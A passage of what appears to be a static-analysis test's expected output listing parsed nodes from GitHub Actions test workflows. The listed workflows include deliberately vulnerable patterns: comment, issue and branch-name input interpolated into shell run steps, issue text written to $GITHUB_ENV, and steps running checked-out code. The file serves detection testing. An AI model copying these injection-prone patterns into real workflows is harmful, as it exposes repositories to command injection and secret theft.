| ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/commands.yml:1:1:39:30 | enter on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push | +| .github/workflows/commands.yml:1:1:39:30 | exit on: push (normal) | +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | +| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:1:1:22:32 | enter on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push (normal) | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo 